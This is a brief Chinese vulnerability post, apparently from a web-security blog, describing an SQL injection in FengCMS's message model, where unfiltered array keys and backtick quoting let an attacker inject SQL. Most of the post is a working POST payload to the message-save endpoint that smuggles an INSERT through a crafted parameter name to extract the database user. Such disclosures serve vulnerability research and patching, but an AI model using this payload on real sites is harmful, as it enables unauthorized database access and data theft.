http://www.fengcms.com/ app\model\messageModel.php
未对数组key过滤。 反引号无视转义。 pyload: POST /?controller=message&operate=save title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319
|
-
上一篇: Coremail某功能多处存储型XSS漏洞 - 网站安全 - 自学php网
下一篇: web安全工程师--成长记录 - 网站安全 - 自学php网
还没有人抢沙发呢~